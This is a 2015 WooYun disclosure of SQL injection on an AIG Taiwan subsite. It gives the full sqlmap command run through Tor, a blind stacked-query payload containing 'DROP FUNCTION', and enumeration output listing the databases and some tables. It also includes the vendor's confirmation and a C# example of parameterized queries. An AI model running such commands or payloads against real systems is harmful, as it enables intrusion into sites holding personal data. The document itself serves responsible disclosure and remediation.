Vulnerability Summary

Defect ID: wooyun-2015-0121913

Title: SQL injection on a subsite of US insurer AIG's Taiwan branch

Related vendor: 台湾美亞產物保險

Author: 路人甲

Submitted: 2015-06-21 11:38

Fixed: 2015-08-07 05:36

Published: 2015-08-07 05:36

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 16

Status: handed over to a third-party partner organization (Hitcon, the Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2015-06-21: Details sent to the vendor; awaiting vendor response
2015-06-23: Vendor confirmed; details disclosed to the vendor only
2015-07-03: Details disclosed to core white hats and experts in related fields
2015-07-13: Details disclosed to regular white hats
2015-07-23: Details disclosed to intern white hats
2015-08-07: Details disclosed to the public

Brief description:

SQL injection on a subsite of US insurer AIG's Taiwan branch

Detailed description:

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=15 --technique=B --union-char=n -u "https://www-401.aig.com.tw/ns/ActivitiesQuery.aspx" --data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=wg3G2%2Bu6KC%2B146U%2Fe9%2BUBpS%2BgEJhmVOnFnG4ypiFhmCo5c1TGbBy7Y7s43eo0BX8nu%2BgUh1AY%2B15R1yBAQ479btXvw1q4QLuAj%2B1p1AwCDypy9arvnXL%2BU0gWdIFJj1i6Zsuo%2FwhrKNuJjRN1t9xB08C4dERvmpoBpEjOPUXBAHDl6ORRrxkmHih8pB7y7AE&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=MFWIggjoXJ%2BeYh9sNebw1JMXHxxRDX5BInViCqUAQ7d3jOUj8AmNi9RB6sb9eVGy&ctl00%24ContentPlaceHolder1%24txtUserID=A180193569&ctl00%24ContentPlaceHolder1%24txtUserBirth=1970%2F01%2F01&ctl00%24ContentPlaceHolder1%24btnSubmit=%E7%A2%BA%E5%AE%9A" --dbs --threads=2
---
Parameter: ctl00$ContentPlaceHolder1$txtUserID (POST)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=wg3G2+u6KC+146U/e9+UBpS+gEJhmVOnFnG4ypiFhmCo5c1TGbBy7Y7s43eo0BX8nu+gUh1AY+15R1yBAQ479btXvw1q4QLuAj+1p1AwCDypy9arvnXL+U0gWdIFJj1i6Zsuo/whrKNuJjRN1t9xB08C4dERvmpoBpEjOPUXBAHDl6ORRrxkmHih8pB7y7AE&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=MFWIggjoXJ+eYh9sNebw1JMXHxxRDX5BInViCqUAQ7d3jOUj8AmNi9RB6sb9eVGy&ctl00$ContentPlaceHolder1$txtUserID=A180193569';IF(1942=1942) SELECT 1942 ELSE DROP FUNCTION mkvG--&ctl00$ContentPlaceHolder1$txtUserBirth=1970/01/01&ctl00$ContentPlaceHolder1$btnSubmit=%E7%A2%BA%E5%AE%9A
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

Proof of vulnerability:

available databases [10]:
[*] AuditDB
[*] chartis
[*] eLearning
[*] elearningM ===> probably only this database is affected
[*] master
[*] Messaging
[*] model
[*] msdb
[*] SMS
[*] tempdb
current user is DBA: False ===> not DBA
[03:00:49] [INFO] fetching number of tables for database 'elearningM'
[03:00:49] [INFO] retrieved: 124
[03:01:31] [INFO] retrieving the length of query output
[03:01:31] [INFO] retrieved: 16
[03:03:09] [INFO] retrieved: dbo.ActiveDetail
[03:03:09] [INFO] retrieving the length of query output
[03:03:09] [INFO] retrieved: 14
[03:04:47] [INFO] retrieved: dbo.Activities
[03:04:47] [INFO] retrieving the length of query output
[03:04:47] [INFO] retrieved: 16
[03:06:28] [INFO] retrieved: dbo.CBC_feedback
[03:06:28] [INFO] retrieving the length of query output
[03:06:28] [INFO] retrieved: 19
[03:08:33] [INFO] retrieved: dbo.CBC_feedback_wk
[03:08:33] [INFO] retrieving the length of query output
[03:08:33] [INFO] retrieved: 10
[03:09:47] [INFO] retrieved: dbo.CGroup
[03:09:47] [INFO] retrieving the length of query output
[03:09:47] [INFO] retrieved: 16
[03:11:17] [INFO] retrieved: dbo.CmemberGroup
[03:11:17] [INFO] retrieving the length of query output
[03:11:17] [INFO] retrieved: 11
[03:12:24] [INFO] retrieved: dbo.Cs_empl
[03:12:24] [INFO] retrieving the length of query output
[03:12:24] [INFO] retrieved: 9
[03:13:26] [INFO] retrieved: dbo.Cuser ===> probably the user table
[03:13:27] [INFO] waiting for threads to finish (Ctrl+C was pressed)
[03:13:27] [CRITICAL] user aborted (Ctrl+C was pressed multiple times)
===> too slow, stopped here


BTW: this only proves the vulnerability exists; no user information was dumped.

Remediation:

Filter input
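The pattern sqlmap reported above (the txtUserID form value spliced into SQL text, so a quote and a semicolon open a stacked query against SQL Server 2008) next to the parameterized form that the one-word remediation amounts to, as an added C# example. This is not the vendor's code; the table dbo.Cuser comes from the output above, while the column names, the ID format check and the date format are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;
using System.Text.RegularExpressions;

public static class ActivitiesQuery
{
    // VULNERABLE (illustrative only): raw form values become part of the SQL text.
    // A quote in txtUserID closes the string literal and a ';' starts a second
    // statement, which is what the boolean-based blind payload above depends on.
    public static string BuildQueryUnsafe(string userId, string userBirth)
    {
        return "SELECT UserID, Birth FROM dbo.Cuser WHERE UserID = '" + userId +
               "' AND Birth = '" + userBirth + "'";
    }

    // HARDENED: values are bound as typed parameters and never concatenated into
    // SQL, so quotes and semicolons in the input are just data.
    // Column names UserID/Birth are assumed; only the table name appears in the report.
    public static SqlCommand BuildQuerySafe(SqlConnection conn, string userId, string userBirth)
    {
        // Reject malformed input before it reaches the database (defence in depth,
        // not a substitute for parameters). Assumed formats: one uppercase letter
        // followed by nine digits for the ID, yyyy/MM/dd for the birth date.
        if (userId == null || !Regex.IsMatch(userId, "^[A-Z][0-9]{9}$"))
            throw new ArgumentException("Invalid user ID format", "userId");

        DateTime birth;
        if (!DateTime.TryParseExact(userBirth, "yyyy/MM/dd", CultureInfo.InvariantCulture,
                                    DateTimeStyles.None, out birth))
            throw new ArgumentException("Invalid birth date format", "userBirth");

        var cmd = new SqlCommand(
            "SELECT UserID, Birth FROM dbo.Cuser WHERE UserID = @UserID AND Birth = @Birth",
            conn);
        cmd.Parameters.Add("@UserID", SqlDbType.VarChar, 10).Value = userId;
        cmd.Parameters.Add("@Birth", SqlDbType.Date).Value = birth;   // DATE exists since SQL Server 2008
        return cmd;
    }
}
```

The report also shows the web application's database login is not DBA; keeping that account limited to SELECT on the eLearning tables is the second half of the fix, since the stacked-query payload could otherwise run DDL such as the DROP FUNCTION seen above.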

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-06-23 05:34

Vendor reply:

Thank you for the report

Latest status:

None